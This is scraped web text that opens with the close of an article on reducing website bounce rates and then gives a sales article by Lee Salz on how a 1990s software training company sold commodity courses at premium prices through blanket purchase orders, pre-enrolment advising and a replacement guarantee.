Test. There are no right or wrong answers here. Wording, colour, shape, placement etc can all be tested to find what produces the best results.
In summary

The tips here are a mixture of methods for persuading users to stay on your site longer, and to explore further.

The latter is key to reduce bounce rates, as they need to interact with your site, but the page they land on creates that all-important first impression.

If the first page doesn’t do its job in terms of delivering relevance to the user and avoiding obvious annoyances, then there’s little chance users will want to stick around.

Also, to repeat the earlier point. Bounce rates are useful, but only used alongside other metrics like time on page and viewers of multiple pages.

Differentiation when selling a commodity

Published by:

Imagine being tasked with building a sales force that would sell the identical products as the competition, but sell those at a premium price. That was the opportunity I accepted when taking on an executive sales leadership role years ago.

In the ’90s, as Microsoft, Novell and IBM/Lotus became software powerhouses, they recognized the need to train users on their products. Without that training, there was a high risk of users being dissatisfied with the products and not purchasing future upgrade releases of them. Rather than train users themselves, they developed training channels. Individual training companies contracted with these software companies and delivered training on their behalf.

However, the software companies didn’t blindly let their channels train users. They created the course curriculum, certified the instructors on the courses, and set the PC standards for the classroom. In essence, the software companies regulated the classroom experience and marketed to users that they could attend any of the thousands of “authorized” training facilities for a fantastic learning experience.

See Also

The needs analysis questions salespeople must ask prospects
Mastering the two most powerful words in sales
Are salespeople about to become extinct?
While the software companies wanted to create a “ vanilla experience” for its clients, that was not the way their training channels approached the business.

Course prices were set all over the board. Salespeople told prospects that their training companies had better instructors and nicer PCs in the classrooms than their competitors, as a way to justify higher course prices. Again, the software companies wrote the curriculum, certified the instructors and provided the specifications for the PCs. How could it be better?

The software companies told clients that all of their authorized training companies were the same, like going to McDonald’s. Thus, prospects didn’t buy the better arguments. They bought low price. Why shouldn’t they? In the absence of differentiation, price is the ultimate decision factor. Yet, the task put in front of me was to build a sales force that could sell our courses at a premium price.

Next steps

While we were passionate that our training was superior, we could not prove it. The classroom was a commodity, but there was still an opportunity to differentiate ourselves and sell at higher prices.

We learned that IT managers had several challenges. First, when an IT manager needed to send an employee for a training course, he needed to get three to five signature approvals on the purchase order. It was the same repeated process for each employee for each course. It was a bureaucratic pain.

Second, there were a significant number of class attendees who, upon taking the course, realized that the course was not right for them or vice versa. This meant the training dollars were lost, as was the time the employee missed at work to take the course.

Finally, because of the demand for trained IT professionals, IT managers feared their trained employees would leave the company.

Given those three issues, we developed a sales strategy based on making it easier for IT managers to get the right training for their employees.

Key strategies

Our salespeople called on senior IT management executives rather than mid-level managers, who most of our competitors called. We introduced the idea of using a blanket purchase order for their training budget. Our training company billed against the blanket purchase order as employees enrolled in the courses. Interestingly, the internal process to get one blanket purchase order for a million dollars of training was the same as one for a fifteen hundred dollar course.

Before any employee was enrolled in a course, one of our education advisors interviewed the prospective student to make sure it was the training he needed and he had the background to succeed in it.

Finally, we offered a replacement guarantee. If an employee we trained left his or her company within a year of completing a course, we trained the new person free of charge.

As a result of this differentiation strategy, we became the largest, most profitable training company for Microsoft, Novell and IBM/Lotus. We sold our courses at 30 to 50 percent higher prices than our competitors. Because we had the blanket purchase order for the entire training budget, our competitors were locked out of these accounts.

While our competitors argued “better,” we positioned “different.” Differentiate yourself by solving the problems your buyers face rather than trying to differentiate commodities.

Need help with differentiation? Download my free “ Making Differentiators Matter” poster.

Lee Salz is a sales management strategist and best-selling author of “Hire Right, Higher Profits,” a top-rated sales and selling management book on Amazon. Salz specializes in helping companies build sales forces through effective hiring, onboarding, managing and compensating salespeople. He is the founder and CEO of Sales Architects, Business Expert Webinars, and The Revenue Accelerator. He is a speaker and a results-driven sales management consultant. Salz can be reached at 763-416-4321.